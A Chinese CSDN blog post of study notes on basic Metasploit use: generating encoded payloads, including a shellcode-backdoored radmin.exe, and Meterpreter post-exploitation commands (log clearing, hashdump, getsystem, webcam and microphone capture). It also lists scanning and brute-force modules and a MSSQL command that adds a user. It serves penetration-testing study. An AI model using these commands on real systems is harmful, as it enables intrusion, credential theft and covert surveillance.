msf基本使用教程

最新推荐文章于 2024-06-15 10:22:15 发布
最新推荐文章于 2024-06-15 10:22:15 发布
阅读量3.2k 收藏 18
点赞数 5
分类专栏: kk
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29176323/article/details/108727363
版权

metasploit-framework

模块

exploit

  • active 找服务器开放的服务的漏洞
  • passive 钓鱼 让受害者有漏洞的软件来主动访问我

payload

▪ use payload/windows/shell_bind_tcp
▪ generate (坏字符)
▪ msf 自动选择编码绕过坏字符
	– generate -b '\x00'
	– generate -b '\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b'
	– generate -b '\x00\x44\x67\x66\xfa\x01\xe0\x44\x67\xa1\xa2\xa3\x75\x4b
	\xFF\x0a\x0b\x01\xcc\6e\x1e\x2e\x26' 
▪ 手动指定编码
	– show encoders / generate -e x86/nonalpha
▪ generate -b '\x00' -t exe -e x86/shikata_ga_nai -i 5 -k -x /usr/
share/windows-binaries/radmin.exe -f /root/1.exe (放到windows上执行 ,然后 本地nc ip port 拿到shell)
▪ NOP:no-operation / Next Operation(无任何操作)
	– EIP 最终会导致shellcode的执行
	– generate -s 14

Meterpreter 高级payload

特性:运行在windows ?
演示环境是:
	ms08_067 (exploit) 
	payload meterpreter_reverse_tcp
基本命令
▪ help̵ background 退出shell
▪ run / bgrun  xxxxx 运行某些命令
▪ cd ls  cat pwd dir mkdir mv rm rmdir edit
▪ lpwd lcd  打开本机的目录
▪ clearev 清理日志
▪ 上传下载
	download ̵ – 
	upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32
▪ execute -f cmd.exe -i –H  执行命令
▪ getuid getsystem getprivs getproxy getpid
▪ migrate pid 注入到其它的进程
▪ hashdump  下载字典文件到本地
	run post/windows/gather/hashdump 同上
▪ sysinfo ps kill migrate reboot shutdown shell
▪ show_mount 挂载    search -f autoexec.bat 搜索文件
▪ arp netstat ipconfig ifconfig route
▪ idletime 是否长时间离线   resource -r r.txt 类似于msf的资源文件
▪ record_mic    webcam_list    webcam_snap -i 1 -v false
加载python

▪ load python 无须python解释器 直接执行python代码
	– Help
	– python_execute "print ('asdasdas')"
	– python_execute "import os; cd = os.getcwd()" -r cd
	– python_import -f find.py   执行python文件

信息收集

nmap扫描

  • – db_nmap -sV 192.168.1.0/24

Auxiliary 模块扫描

– RHOSTS <> RHOST 
	▪ 192.168.1.20-192.168.1.30̵ 
	▪ 192.168.1.0/24,192.168.11.0/24
	▪ file:/root/h.txt
– search arp 
	▪ use auxiliary/scanner/discovery/arp_sweep  和nmap扫描结果类似
	▪ set INTERFACE RHOSTS SHOST SMAC THREADS    run
– search portscan
	▪ use auxiliary/scanner/portscan/syn
	▪ set INTERFACE  PORTS RHOSTS THREADS     run

udp扫描

nmap -sU 
扫描开放的udp端口
	– use auxiliary/scanner/discovery/udp_sweep
	– use auxiliary/scanner/discovery/udp_probe

nmap IPID Idle

扫描按顺序递增的很空闲的主机
– 查找 ipidseq 主机
	▪ use auxiliary/scanner/ip/ipidseq
	▪ set RHOSTS 192.168.1.100-192.168.1.200
– nmap -PN -sI 1.1.1.2 1.1.1.3 进行欺骗

密码嗅探

只能扫描本机的输入记录 感觉没啥用
– use auxiliary/sniffer/psnuffle
– 支持从pcap文件中提取密码
– 功能类似 dsniff
– 目前只支持 ftp pop3 http-get 协议

snmp扫描

以metasploit的虚拟机玩

– vi /etc/default/snmpd # 修改侦听端口 0.0.0.0
– linux的
	▪ use auxiliary/scanner/snmp/snmp_login  登陆
	▪ use auxiliary/scanner/snmp/snmp_enum  扫描信息
– windows
	▪ use auxiliary/scanner/snmp/snmp_enumusers 枚举用户
	▪ use auxiliary/scanner/snmp/snmp_enumshares

smb扫描


– smb版本扫描
	▪ use auxiliary/scanner/smb/smb_version
– 扫描 命名管道 判断服务类型
	▪ use auxiliary/scanner/smb/pipe_auditor
– 扫描 通过smb管道可以访问的 RCERPC 服务
	▪ use auxiliary/scanner/smb/pipe_dcerpc_auditor
– smb共享枚举
	▪ use auxiliary/scanner/smb/smb_enumshares
– smb用户枚举
	▪ use auxiliary/scanner/smb/smb_enumusers
– SID枚举
	▪ use auxiliary/scanner/smb/smb_lookupsid

ssh扫描

ssh 版本扫描
	▪ use auxiliary/scanner/ssh/ssh_version
	▪ 1.0存在漏洞
– ssh 密码爆破
	▪ use auxiliary/scanner/ssh/ssh_login
	▪ 字典文件的位置 framework/data/wordlists
	▪ 可以用美杜莎爆破
– ssh 公钥登陆
	▪ use auxiliary/scanner/ssh/ssh_login_pubkey
	▪ set KEY_FILE id_rsa

mssql 扫描


– TCP 1433  UDP 1434
	▪ use auxiliary/scanner/mssql/mssql_ping
	▪ 扫描微软的 mssql 使用的动态端口(非1433)
– 密码爆破
	▪ use auxiliary/scanner/mssql/mssql_login
– 远程代码执行
	▪ use auxiliary/admin/mssql/mssql_exec
	▪ set CMD   net user user pass /ADD # 加用户

ftp 扫描

ftp 版本扫描 21
	▪ use auxiliary/scanner/ftp/ftp_version
	▪ use auxiliary/scanner/ftp/anonymous
	▪ use auxiliary/scanner/ftp/ftp_login

弱点扫描

RDP 远程桌面漏洞

– 只是检查模块检查,不会造成dos攻击
	▪ use auxiliary/scanner/rdp/ms12_020_check
	▪ 存在漏洞后 search ms12_020

VMWare ESXi 密码爆破

▪ use auxiliary/scanner/vmware/vmauthd_login
▪ use auxiliary/scanner/vmware/vmware_enum_vms

http 弱点扫描

– 过期证书
	▪ use auxiliary/scanner/http/cert
– 显示目录和证书
	▪ use auxiliary/scanner/http/dir_listing
	▪ use auxiliary/scanner/http/files_dir
– WebDAV Unicode 编码身份验证绕过
	▪ use auxiliary/scanner/http/dir_webdav_unicode_bypass
– Tomcat 管理登陆页面
	▪ use auxiliary/scanner/http/tomcat_mgr_login
– 基于 http 方法的身份绕过
	▪ use auxiliary/scanner/http/verb_auth_bypass
– Wordpress 密码爆破
	▪ use auxiliary/scanner/http/wordpress_login_enum
	▪ set URI /wordpress/wp-login.php

WMAP WEB 应用扫描器

– 根据sqlmap设计
– load wmap
– 使用
	▪ wmap_sites -a http://1.1.1.1  # 指定站点
	▪ wmap_targets -t http://1.1.1.1/mutillidae/index.php # 指定目标
	▪ wmap_run -t # 展示模块
	▪ wmap_run -e # 直接执行
	▪ wmap_vulns -l  # 列出站点
	▪ vulns
千年恨
关注
  • 5
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
MSF使用教程
hackzkaq的博客
10-18 3万+
公众号:白帽子左一 MSF简介 Metasploit(MSF)是一个免费的、可下载的框架 它本身附带数百个已知软件漏洞,是一款专业级漏洞攻击工具。 当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了,仿佛一夜之间,任何人都可以成为黑客。 因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。 也因此软件厂商再也不能推迟发布针对已公布漏洞的补丁了,因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所.
详尽的msf——meterpreter——渗透测试教程
qq_42882717的博客
03-21 2万+
详尽的msf——meterpreter——渗透测试教程,如何使用,如何前中后期做渗透测试
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
最新发布
zzz6583zz的博客
06-15 943
l, --list <type> 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload <payload> 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format <format> 指定输出格式-e, --encoder <encoder> 指定需要使用的encode,指定需要使用的编码。
什么是msf
qq_30503389的博客
05-16 1684
Metasploit框架(Metasploit Framework)是一个开源的、可扩展的安全漏洞检测和攻击工具,由Rapid7公司开发。它的主要目的是帮助安全研究人员、红队成员和渗透测试人员发现、利用和防御安全漏洞。Metasploit Framework 提供了一套强大的工具集,使攻击者能够利用已知的安全漏洞进行攻击,同时也提供了防御措施来防止攻击者利用这些漏洞。
生命在于学习——MSF初体验(一)
易水哲的博客
10-20 2886
Metasploit初体验(一)
渗透测试神器-msf基础
qq_51796436的博客
12-01 5141
渗透测试在远控,权限维持阶段不可避免的要用到msf,在awd中也会经常用到,msf的功能不可谓不强大
SQLMAP使用笔记.pdf
01-25
一、SQLMAP 的基本使用 SQLMAP 的基本语法为:`sqlmap -u <url> [options]` 其中,`-u` 选项指定了要测试的 URL,`[options]` 是可选的参数和选项。 二、常用参数 1. `-f`:指定指纹判别数据库类型 2. `-b`:...
MSF中文材料--手工整理
12-15
描述中的"MSF材料,根据英文自己整理的"确认了这些资料的来源和性质,即它们是从英文原始材料转化而来的,可能包括文档、教程、代码示例等,目的是为了方便中文使用者理解和学习MSF。 **Metasploit Framework(MSF...
CTF6靶机实战.zip
05-25
此外,标签中的“MSF”指的是Metasploit Framework,这是一个广泛使用的开源渗透测试工具。在CTF比赛中,可能会用到Metasploit来生成payloads、执行exploits和管理会话。参赛者需要掌握如何使用Metasploit进行信息...
图文并茂介绍在VS2010里使用TFS2010
11-13
**在Visual Studio 2010 (VS2010)中使用Team Foundation Server (TFS2010)的图文教程** Visual Studio 2010与Team Foundation Server 2010的集成提供了全面的软件开发生命周期管理(ALM)工具。本教程将详细介绍...
Visual Studio Team System面面观系列课程(11):VSTS项目管理理论基础——MSF(上)
11-13
《Visual Studio Team System面面观系列课程》是针对软件开发团队的一款强大工具的深度解析系列教程,本节课程聚焦在“VSTS项目管理理论基础——MSF(上)”。MSF,全称Microsoft Solutions Framework,是微软提出的...
msf基本使用,基本命令说明
cjh12340826的博客
07-10 2319
xxx_nonx_tcp : no execute 或 win7 (NX是应用在cpu的一种可以防止缓冲区溢出的技术)shell_reverse_tcp:反向连接到攻击者主机并创建一个shell。reverse_http: 通过HTTP隧道通信并创建一个新用户添加到管理组。shell_find_tag: 在已建立的连接上创建一个shell。add_user :创建一个新用户添加到管理组。bind_tcp : 监听一个tcp连接。21,version显示一个控制台版本。7,info 显示一个模块的详细信息。
msf 渗透基础篇(基本命令)
失心少年
07-30 2454
以 kali 为例,几个关键路径,熟悉一下,为了更方便的查找。
Metasploit渗透测试框架的基本使用
weixin_68281676的博客
09-01 1624
msf渗透攻击的使用
MSFconsole工具】下载、启动方法、msf常用基础命令、模块功能、核心命令(入门初识)
02-11 6741
MSFconsole】初识
MSF学习之旅之初识MSF
0nc3的博客
06-12 803
0x00 前言 emmmm刚接触Metasploit还有点懵,记录一下学习过程 参考了《Metasploit渗透测试指南》一书 0x01 安装MSF终端 Kali无需安装,自带 0x02 启动MSF终端 两种方法: 方法一:在图形界面直接打开 方法二:命令行输入msfconsole 0x02 使用Armitage 可以直接点击运行,也可通过armitage命令运行 选择Connect–&gt...
metasploit 使用教程
热门推荐
jiangliuzheng的专栏
01-20 10万+
METASPLOIT基础入门 1、基础知识 1.1 简介 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 Metasploit Framework最初是 HD Moore 个人的想法,当时他在一家安全公司工作,他于2003年10月发布了第一个基于Perl的Metasp
kali 升级msfmsf6
liulanghouzi的博客
12-04 5696
安装kali过程注意不要使用网络镜像,以及将grub安装至硬盘时选择/dev/sda,其它一律默认即可 安装好kali后,启动msf,发现版本很旧,没有近期的cve,打算升级一下。 但是输入apt-get update;apt-get install metasploit-framework,告诉我msf已经是最新,无须更新。 原因是安装kali时没有使用网络镜像,启动kali后又没有设置apt源,没有源当然无法更新啊。 打开/etc/apt/sources.list,添加国内镜像源: deb
kali 的msf怎么使用
03-31
Msf是Metasploit Framework的缩写,是一款开源的网络安全渗透测试工具。在Kali Linux中,Msf已经预装好了,可以通过以下步骤启动Msf: 1. 打开终端,输入命令“msfconsole”进入Msf控制台。 2. 在控制台中输入“help”命令,查看支持的模块和指令。 3. 使用“search”命令搜索可用的模块,例如“search ftp”可以搜索所有关于FTP漏洞的模块。 4. 使用“use”命令选择一个模块,例如“use exploit/windows/smb/ms17_010_eternalblue”。 5. 根据模块的要求设置参数,例如“set RHOST 192.168.1.100”设置目标主机的IP地址。 6. 执行攻击,例如“exploit”命令。 7. 如果攻击成功,可以使用“sessions”命令查看会话列表,并使用“sessions -i <会话编号>”命令进入一个会话。 8. 在会话中,可以使用各种命令执行攻击、获取信息等操作。例如“shell”命令可以获取目标主机的shell权限,然后执行各种命令。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值